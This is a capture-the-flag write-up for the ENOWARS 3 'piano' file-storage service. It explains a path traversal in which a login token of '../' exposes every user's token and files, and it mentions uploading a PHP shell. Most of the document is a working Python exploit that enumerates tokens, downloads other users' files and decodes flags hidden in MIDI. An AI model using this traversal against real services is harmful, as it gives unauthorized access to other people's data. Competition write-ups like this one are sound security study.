Saarsec

saarsec

Schwenk and pwn

ENOWARS 3 WriteUp piano

Service Overview

The website allows to generate/register a new token, which is used as login to the service. After logging in, the service acts as some kind of cloud-storage, so the user can upload files to his folder and download them again.

The Vulnerability

At the login, the login-token is stored in the user’s session and the login is considered successful if the token is not empty. When uploading and downloading files, the token is used in the path. And, since there was no restriction on the allowed chars nor any escaping, it was possible to perform path traversal attacks.

To leak the tokens of all other users, we simply have to login as ../ and our cloud-storage does not refer to ./data/<someid>/ but to ./data/. Now, the service happily lists all the folders/tokens.

Using those tokens, we can now download the files each user uploaded.

We finished the exploit before the network was open and thought we are done with the service. However, it turns out, the gameserver stores the flags not as text, but as MIDI files. (In hindsight, yes, the name and the javascript piano might be hinting on that, but I somehow did not expect that in this moment of happyness)

The stego part

Sebi (for some people also known as steg1), our most valuable stego expert, opened up the MIDI file in Audacity and quickly found out that the combination of active notes over the time represent the flag.

content

Parsing the flag

Using r2 (only as an hex editor) and wikipedia, I got a really quick overview about the MIDI file format. After the 52B header, the interesting data consists of 4B structs:

struct {
    char some_constant;        // always 0x40
    char next_time_interval;   // 0x18 if it's the last info for the current time interval, 0x00 otherwise
    char action;               // 0x90 to activate note, 0x80 to deactivate note
    char note;                 // the affected note (0x36,...,0x4c)
}

Now, we can tell for each time interval, which notes are enabled. Using that bitmap, we simply hardcoded by hand the sequences for each character we found in our own flags. Completely by hand was a bit difficult, so I built a little script that plotted the part of the flag that could not be parsed together with the sequence we have to add to our character mapping.

content

Also a little problem was that the representation of some characters were subsets of other characters. For example, the beginning of an U is represented like an l. To overcome this issue, we built the parser in a way that it looks ahead and chooses the longest matching character.

Discussion

Until we fixed all the bugs in our code, the exploit was unfortunately not really useful anymore. I assume this is because each exploit created an empty directory, which massively slows down the speed of the exploit. After talking to some other CTF teams, I found out that the path traversal can indeed be used to upload a php shell. But, somehow I thought during the CTF that the html folder is not writable and have not tried to exploit it. I think with an RCE, it would have been possible to find the new and non-empty folders efficiently.

Although the vulnerability was not very special, the MIDI parsing made this challenge interesting. Overall, the ENOWARS were really fun and we are looking forward to the next one.

Exploit

session_cache = {}

def ls(dir, ip):

    regex = re.compile("download\.php\?file=([^']+)")

    if dir in session_cache:
        s = session_cache[dir]
    else:
        s = requests.session()

    addr = "http://{}/".format(ip)

    s.post(addr+"login.php", data={"token": dir}, timeout=20)

    session_cache[dir] = s

    r = s.post(addr, timeout=20).text

    return [match.group(1) for match in regex.finditer(r)]

def dl(dir, file, ip):

    if dir in session_cache:
        s = session_cache[dir]
    else:
        s = requests.session()

    addr = "http://{}/".format(ip)

    s.post(addr+"login.php", data={"token": dir}, timeout=20)

    session_cache[dir] = s

    return s.get(addr+"download.php", params={"file": file}, timeout=20).content

def decode_flag2(d):
    """
    some alternative encoding I observed on the nop-team (might be decoy)
    :param d:
    :return:
    """
    offset = 0x32+3
    d = d[offset:]
    i = 0
    flag = ""
    while i*8+8 < len(d):
        flag += d[i*8]
        i += 8
    return flag

MAPPING = {
    '[1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1]': 'E',
    '[1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1]': 'N',
    '[0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0]': 'O',
    '[0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1]': 'Q',
    '[0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0]': 's',
    '[0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1]': 'A',
    '[1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0]': 'B',
    '[0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 0]': 'w',
    '[0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0]': 'C',
    '[1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0]': 'U',
    '[1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1]': 'U',
    '[0, 1, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0]': '8',
    '[0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0]': 't',
    '[0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0]': 'o',
    '[1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0]': 'd',
    '[0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0]': '3',
    '[1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0]': 'P',
    '[1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]': 'F',
    '[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0]': 'J',
    '[0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1]': '2',
    '[1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1]': 'K',
    '[0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1]': 'd',
    '[1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1]': 'L',
    '[0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1]': 'a',
    '[1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0]': '7',
    '[1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0]': 'b',
    '[1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1]': 'X',
    '[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0]': 'y',
    '[0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1]': 'z',
    '[1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1]': 'k',
    '[0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0]': '0',
    '[1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1]': 'h',
    '[0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0]': 'g',
    '[0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1, 1, 0]': 'S',
    '[0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0]': 'r',
    '[0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0]': '4',
    '[0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 0]': 'j',
    '[0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0]': '=',
    '[0, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0]': '9',
    '[0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]': 'f',
    '[0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1]': 'q',
    '[1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1]': 'H',
    '[1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0]': 'V',
    '[1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0]': 'U',
    '[1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]': 'T',
    '[0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 1]': 'e',
    '[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0]': '-',
    '[1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0]': '5',
    '[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0]': 'v',
    '[1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1]': 'I',
    '[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1]': '_',
    '[0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1]': 'n',
    '[0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1]': '1',
    '[1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1]': 'R',
    '[0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1]': 'u',
    '[0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0]': '6',
    '[1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0]': 'Y',
    '[0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0]': 'c',
    '[1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1]': 'M',
    '[0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1]': 'm',
    '[1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1]': 'Z',
    '[0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1]': 'x',
    '[1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0]': 'W',
    '[0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1]': 'i',
    '[0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 1]': 'G',
    '[0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0]': 'p',
    '[0, 0, 0, 0, 0, 0, 0]': '',
}

def decode_flag(d):
    channels = 7 * [0]

    offset = 0x32
    d = d[offset:]

    chars = ""
    buf = []

    l = []

    i = 0
    while i + 3 < len(d):
        c = d[i:i + 4]
        channel = ord(c[1]) - 0x36
        # print channel
        channels[channel] = int(c[0] == '\x90')
        if c[3] == "\x18":
            l.append(channels[::-1])
        i += 4
    all_buf = []
    buf = []
    while len(l) > 0:
        line = l.pop(0)
        # print(line)
        next = l[0] if len(l) > 0 else []
        tmp = buf + line
        buf = buf + line
        dist = 0
        skip = False
        for next in l:
            if dist > 10:
                break
            dist += 1
            tmp += next
            if str(tmp) in MAPPING:
                skip = True
                break
        if skip:
            continue
        if str(buf) in MAPPING:
            chars += MAPPING[str(buf)]
            all_buf += buf
            buf = []
        elif len(buf) > 7 * 5:
            c = all_buf + list("2222222") + buf
            print chars
            print "unknown mapping:"
            print "------------"
            for x in range(7):
                print "".join(
                    "#" if c[i * 7 + x] == 1 else " " if c[i * 7 + x] == 0 else "x" for i in range(len(c) / 7))
            print "------------"
    return chars


def exploit(ip, _, __):
    for token in ls("../data", ip):
        # print token
        if not redisget("piano2_"+token):
            for file in ls(token, ip):
                # print token, file
                data = dl(token, file, ip)
                # print repr(data)
                flag = ""
                try:
                    flag = decode_flag(data)
                except:
                    try:
                        flag = decode_flag2(data)
                    except:
                        pass
                print(flag)
                redisset("piano2_"+token, True)




if __name__ == '__main__':
    if len(sys.argv) < 3:
        exploit(sys.argv[1], "")
    elif len(sys.argv)< 4:
        exploit(sys.argv[1], sys.argv[2])
    else:
        exploit(sys.argv[1], sys.argv[2], sys.argv[3])